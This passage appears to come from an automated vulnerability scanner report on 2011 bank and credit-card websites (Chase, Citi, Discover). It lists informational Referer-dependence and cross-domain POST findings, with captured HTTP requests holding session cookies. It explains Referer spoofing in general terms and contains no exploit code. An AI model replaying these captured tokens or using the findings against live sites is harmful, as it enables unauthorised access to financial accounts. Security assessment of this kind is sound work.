Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

13.1. https://applynowdc1.chase.com/FlexAppWeb/renderApp.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/renderApp.do

Request 1

Response 1

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Fri, 17 Jun 2011 12:06:40 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache,no-store,max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 271358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3
...[SNIP]...
       }
   }

   function createOfferIDCookie(offerID)
   {

       var msc = "999999999999999";
       var cell = "6H8X";
       var tagId = "null";
       var pvid="1118b79220110c061317070b00ed04";
       var referer="www.creditcards.com%2Foc%2F%3Fpid%3D22125109%26pg%3D17%26pgpos%3D9";
       var cigAppId="20110617_9505985_4";


       //Set the expiry time to 8 mins
       //8 * 1000 * 60 minutes
       var exp = new Date();
       exp.setTime(exp.getTime() + 480000);
       setCookie("OFFER_ID", offerID, exp, "/", ".chase.com", "true");
       setCookie("DC_MSC",msc, exp, "/", ".chase.com", "true");
       setCookie("DC_CELL",cell, exp, "/", ".chase.com", "true");
       setCookie("DC_tagid",tagId, exp, "/", ".chase.com", "true");
       setCookie("DC_pvid",pvid, exp, "/", ".chase.com", "true");
       setCookie("DC_Referer",referer, exp, "/", ".chase.com", "true");
       setCookie("DC_cig_app_id",cigAppId, exp, "/", ".chase.com", "true");


   }

   function validateAndSubmitFrame()
   {
       reTryCount++;
        try
        {

           var offerID = "DF92";
           document.forms[0].auth_userId.value = _userId.toLowerCase();
           document.forms[0].auth_passwd.value = _password.toLowerCase();
           document.forms[0].auth_deviceId.value = deviceId();
           document.forms[0].auth_deviceSignature.value = deviceSignature();
           document.forms[0].auth_deviceCookie.value=deviceCookie();

           document.forms[0].method="post";
           document.forms[0].action="https://mfasa.chase.com/auth/fcc/login";

           /*
            * Before submitting the username / password to the GatewayUI for authentication,
            * create the URL_PARAMETERS_COOKIE and OFFER_ID cookie. And clean up the existing
            * ACTION_PREFILL_OBJECT_NAME object from UserScopeObject.
            */
           createUrlParameterCookie();
           createOfferIDCookie(offerID);

           document.forms[0].auth_externalData.value="LOB=FlexApp&FlexAppId=" + offerID;

           document.forms[0].submit();
       }
       catch(e)
       {
           if(reTryCount >= _maxReTryCount)
           {
               window.location.href="/wl_timeout_splash.html?fromLogon";
           }
           else
           {
               setTimeout("validateAndSubmitFrame()",_reTryInterval);
           }
    }
   }
</script>
<script type="text/javascript" language="javascript">
   fun
...[SNIP]...

Request 2

GET /FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-rs08mTiqNvJG3ktOS3.NLg&pvid=1118b79220110c061317070b00ed04 HTTP/1.1
Host: applynowdc1.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; FlexSessionID=Yqv1N71Nh3KMpxQ41JvJFjTwbJczJGSSL2pQthy2QY1JRMTy16LF!-1254913621

Response 2

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Fri, 17 Jun 2011 12:07:00 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache,no-store,max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 271234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3
...[SNIP]...
       }
   }

   function createOfferIDCookie(offerID)
   {

       var msc = "999999999999999";
       var cell = "6H8X";
       var tagId = "null";
       var pvid="1118b79220110c061317070b00ed04";
       var referer="";
       var cigAppId="20110617_9506017_22";


       //Set the expiry time to 8 mins
       //8 * 1000 * 60 minutes
       var exp = new Date();
       exp.setTime(exp.getTime() + 480000);
       setCookie("OFFER_ID", offerID, exp, "/", ".chase.com", "true");
       setCookie("DC_MSC",msc, exp, "/", ".chase.com", "true");
       setCookie("DC_CELL",cell, exp, "/", ".chase.com", "true");
       setCookie("DC_tagid",tagId, exp, "/", ".chase.com", "true");
       setCookie("DC_pvid",pvid, exp, "/", ".chase.com", "true");
       setCookie("DC_Referer",referer, exp, "/", ".chase.com", "true");
       setCookie("DC_cig_app_id",cigAppId, exp, "/", ".chase.com", "true");


   }

   function validateAndSubmitFrame()
   {
       reTryCount++;
        try
        {

           var offerID = "DF92";
           document.forms[0].auth_userId.value = _userId.toLowerCase();
           document.forms[0].auth_passwd.value = _password.toLowerCase();
           document.forms[0].auth_deviceId.value = deviceId();
           document.forms[0].auth_deviceSignature.value = deviceSignature();
           document.forms[0].auth_deviceCookie.value=deviceCookie();

           document.forms[0].method="post";
           document.forms[0].action="https://mfasa.chase.com/auth/fcc/login";

           /*
            * Before submitting the username / password to the GatewayUI for authentication,
            * create the URL_PARAMETERS_COOKIE and OFFER_ID cookie. And clean up the existing
            * ACTION_PREFILL_OBJECT_NAME object from UserScopeObject.
            */
           createUrlParameterCookie();
           createOfferIDCookie(offerID);

           document.forms[0].auth_externalData.value="LOB=FlexApp&FlexAppId=" + offerID;

           document.forms[0].submit();
       }
       catch(e)
       {
           if(reTryCount >= _maxReTryCount)
           {
               window.location.href="/wl_timeout_splash.html?fromLogon";
           }
           else
           {
               setTimeout("validateAndSubmitFrame()",_reTryInterval);
           }
    }
   }
</script>
<script type="text/javascript" language="javascript">
   function showHideUserNamePwdSection(d) {
       if(navigator.appName.ind
...[SNIP]...

13.2. https://www.citicards.com/ServerError.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/ServerError.html

Request 1

GET /ServerError.html?ts=1308314058155 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; CARDS_LOCALE=en; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315857466%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 17 Jun 2011 12:34:19 GMT
Content-type: text/html
Vary: accept-encoding
Content-Length: 560

<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>
<H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it. Please inform the site administrator of the <A HREF="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&STRIPPED&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63">referring page</A>.

Request 2

GET /ServerError.html?ts=1308314058155 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; CARDS_LOCALE=en; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315857466%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 17 Jun 2011 12:34:27 GMT
Content-type: text/html
Vary: accept-encoding
Content-Length: 292

<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>
<H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it.

14. Cross-domain POST previous next
There are 11 instances of this issue:

http://blogs.creditcards.com/
http://blogs.creditcards.com/fine-print/
https://online.citibank.com/US/JRS/portal/prefillApps.do
https://online.citibank.com/US/JRS/portal/prefillApps.do
https://online.citibank.com/US/JRS/portal/prefillApps.do
https://online.citibank.com/US/JRS/portal/prefillApps.do
http://www.discovercard.com/discover/jscripts/onlineopinionF3r/oo_engine_c.js
https://www.discovercard.com/scripts/optimized/vendor-ac-global-bottom.js
https://www.discovercard.com/scripts/optimized/vendor-ac-global-bottom.js
https://www.discovercard.com/scripts/optimized/vendor-dc-global-bottom.js
https://www.discovercard.com/scripts/optimized/vendor-dc-global-bottom.js

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

14.1. http://blogs.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET / HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311924490%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.creditcards.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:49 GMT
Server: Apache
Content-Type: text/html
Content-Length: 102122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<div class="module">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=2128253', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">

<a target="_blank" href="http://feeds.feedburner.com/Taking_Charge">
...[SNIP]...

14.2. http://blogs.creditcards.com/fine-print/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/fine-print/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET /fine-print/ HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:29 GMT
Server: Apache
Content-Type: text/html
Content-Length: 101644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<div class="module">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=2128253', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">

<a target="_blank" href="http://feeds.feedburner.com/Taking_Charge">
...[SNIP]...

14.3. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734 HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:32 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734" method="post">

</form>
...[SNIP]...

14.4. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529043&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=0000O2LiLgu1O0sXzc7WvVOjgQB:prap5-usgcb2

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:56 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63" method="post">

</form>
...[SNIP]...

14.5. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=0000O2LiLgu1O0sXzc7WvVOjgQB:prap5-usgcb2

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:10 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA" method="post">

</form>
...[SNIP]...

14.6. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529047&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=0000O2LiLgu1O0sXzc7WvVOjgQB:prap5-usgcb2

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:00 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63" method="post">

</form>
...[SNIP]...

14.7. http://www.discovercard.com/discover/jscripts/onlineopinionF3r/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/discover/jscripts/onlineopinionF3r/oo_engine_c.js

Issue detail

The page contains a form which POSTs data to the domain secure.opinionlab.com. The form contains the following fields:

rating
custom_var
time1
time2
prev
referer
width
height

Request

GET /discover/jscripts/onlineopinionF3r/oo_engine_c.js HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:06 GMT
Server: Apache
Last-Modified: Mon, 19 Jul 2010 06:06:58 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 12849
Content-Type: application/x-javascript

/* OnlineOpinion (F3rS,8448b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,
O
...[SNIP]...
<BODY><FORM name=O_Frm id=O_Frm action="https://secure.opinionlab.com/rate36.asp" method=post><input type=hidden name=rating value=' + O_id + '>
...[SNIP]...

14.8. https://www.discovercard.com/scripts/optimized/vendor-ac-global-bottom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/optimized/vendor-ac-global-bottom.js

Issue detail

The page contains a form which POSTs data to the domain secure.opinionlab.com. The form contains the following fields:

rating
custom_var
time1
time2
prev
referer
width
height

Request

GET /scripts/optimized/vendor-ac-global-bottom.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/registration/reg/goto?forwardName=forgotuserid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i:13ffb8sd7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:57 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:39:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
